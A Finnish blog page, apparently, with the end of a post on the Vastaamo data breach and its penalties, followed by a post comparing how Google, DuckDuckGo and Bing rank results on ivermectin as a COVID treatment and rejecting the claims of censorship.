Vastaamon tietomurto elää myyjien, konsulttien ja it-ammattilaisten puheissa ja Powerpointeissa vielä vuosia. Tapaus osoitti, miten tietoturvamokat voivat kaataa koko yrityksen. Kukaan ei halua uudeksi vastaamoksi.

Myös rangaistuksia pitäisi miettiä uudelleen. Vakavakin tietomurto voi jäädä ilmoittamatta, koska työntekijää ei voi rangaista siitä. Julkishallinnossa tilanne on virkavastuun vuoksi toinen. Maksimirangaistus tietosuojarikoksesta (tahallaan tai törkeästä huolimattomuudesta rikkoo henkilötietojen käsittelyn turvallisuutta) on mitätön yksi vuosi, joten syyteoikeus vanhenee kahdessa vuodessa. Saa nähdä, ehditäänkö Vastaamossa syytteitä edes nostaa siinä ajassa.

Toivottavasti Vastaamo jää alan suurimmaksi rikokseksi, eikä suurempaa ruumista Suomen oloissa enää tule. Silloin tapahtuneesta olisi edes jotain hyötyä.

keskiviikko 20. lokakuuta 2021

Piilottaako Google koronalääkkeen hakutuloksia?

Twitterissä liikkuu väitteitä, joiden mukaan Google sensuroisi koronatietoutta ja nostaisi esiin virallisia totuuksia. Netin salaliittohörhöt uskovat tietävänsä paremmin, koska ovat tehneet "omaa tutkimusta" Youtube-videoita katsomalla.

Todisteena Googlen tulosmanipuloinnista käytetään hakua Tokyo Medical Association Ivermectin. Totta on, että Google nostaa tulosten kärkeen tuloksia, joissa suhtaudutaan kielteisesti Tokion lääketieteellisen yhdistyksen (?) Ivermectin-suosituksiin:

Googlen hakutulokset.

Ensimmäinen tulos on päivätty 14.9.2021 ja se tiivistää kaiken oleellisen: Japan has not approved Ivermectin as a COVID-19 treatment

Monet uskovat, että DuckDuckGo olisi Googlea luotettavampi, koska se ei manipuloi tuloksia. Ja kas kummaa, siellä tosiaan kärkeen nousevat Ivermectin-suositusten linkit:

Onko DuckDuckGo parempi hakukone?

Ensimmäinen niistä on tämä 1.9.2021 päivätty epämääräisen tohtori Eddy Bettermannin kirjoitus: Head of Tokyo Medical Association says “now is the time” for all covid patients to get ivermectin, not vaccines.

Kokeillaan vielä Microsoftin Bing-hakua:

Lähes samat tulokset kuin DuckDuckGo:lla.

Näyttää siltä, että DuckDuckGo käyttää sisäisesti Microsoftin hakua, ja antaa siksi Googlesta poikkeavia tuloksia. Se ei kuitenkaan ole osoitus hakukoneen "rehellisyydestä" vaan pikemminkin päinvastoin: Microsoftin kärkeen nostamat uutiset ovat syyskuun alusta, kun taas Googlen tulokset ovat syyskuun puolivälistä ja kiistävät aiemmin esitetyt väitteet virheellisinä.

Sekä DuckDuckGo:n että Bingin tuloksista löytyy myös Ivermectin-suosituksen kiistäviä uutisia (DuckDuckGo:lla viidentenä, Bingillä kakkosena), mutta Google on yksinkertaisesti painottanut uusia, päivitettyjä tietoja enemmän, ja nostanut uudemman tiedon ykköseksi. DuckDuckGo/Bing näyttävät vanhempia tietoja. Google on siten parempi ja sen ykköseksi nostama kirjoitus luotettavampi kuin yksittäisen jenkkitohtorin kanta.

On helppoa epäillä Googlea sensuurista ja ajatteluun vaikuttamisesta. Vastaava tapaus oli alkuvuodesta levinnyt haku Happy White woman. Epäilijät näkivät siinäkin merkkejä tahallisesta vaikuttamisesta.

Tarkkana kannattaa olla. Juuri äskettäin Google kertoi, että se "aikoo kannustaa ympäristö­ystävällisempiin valintoihin, alkaa muokata hakutuloksia" niin hakukoneessa kuin Maps-karttaohjelman reittivalinnoissa. Hakukoneen ei pidä "kannustaa" mihinkään muuhun kuin oikeaan tietoon. Muu arvottaminen kuuluu käyttäjälle.

Jokainen hakukone joutuu tekemään valintoja. Niitä kutsutaan algoritmeiksi. Googlen tapauksessa kärkituloksiin vaikutetaan myös käsityönä, siksi Googlen tulokset ovat paljon osuvampia kuin Microsoftin Bingin tulokset. Googlella tietoisesti tehdyt painotukset ovat mahtava ase maailmanlaajuisen ajattelun muokkaamiseksi. Täytyy vain toivoa, että Google käyttää tätä valtaa jatkossakin vastuullisesti.

Ivermectin ei kuitenkaan ole todistus yhtään mistään. Edelleenkin kyse on ihmis- ja eläinlääketieteessä käytetystä matolääkkeestä. Jostain syystä rokotevastaiset ovat halunneet tehdä siitä vaihtoehdon rokotuksille. Mitään tietellistä näyttöä Ivermectinin hyödyistä ei ole

Kiitos Google, että kerrot sen. Ja häpeä DuckDuckGo:lle, että se nostaa ensimmäiseksi yksittäisen lääkärin perusteettoman kirjoituksen.